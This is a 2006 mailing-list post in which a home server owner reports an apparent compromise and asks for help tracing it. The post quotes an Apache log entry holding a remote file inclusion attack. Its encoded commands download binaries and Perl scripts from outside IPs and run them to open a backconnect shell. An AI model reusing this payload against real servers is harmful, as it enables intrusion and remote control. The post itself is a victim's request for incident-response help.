My home desktop was compromised, but how?
Carthik Sharma
carthik at gmail.com
Tue Feb 28 20:44:21 UTC 2006
Hi,
I run an apache, ssh server from my home computer. I have not
installed any php scripts whatsoever. All there are are text files,
and the odd html file.
Somebody seems to have hacked into my desktop/server. I find files in
the /tmp/ (like "agent.8213)directory which I cannot open, these are
setuid-ed -- how do I open these?
In my apache access logs, there are things like
"http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo|"
That above is a valid url, and will take you to a script to deface
someone's php script etc, I suppose. Now, how did this malicious
hacker get in my computer?
(The full line is :
192.168.0.201 - - [26/Feb/2006:14:56:06 -0500] "GET
/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo|
HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)" )
How would I go about tracing how this incident happened?
Any server/security admins here that can help me with a little
patience? I really want to get to the root of this and find out why
whatever happened happened.
None of the passwords for the ssh accounts are dictionary words, in
fact all are combinations of letters, numbers and sometimes special
symbols.
I have done nothing special to modify apache, or the ssh daemon, in
fact, sshd listens on port 8888.
I could paste logs here, but they would be too long. For now, I have
stopped the apache and ssh servers.
Any help will be most welcome. My security bubble just burst :(
Carthik.
More information about the ubuntu-users
mailing list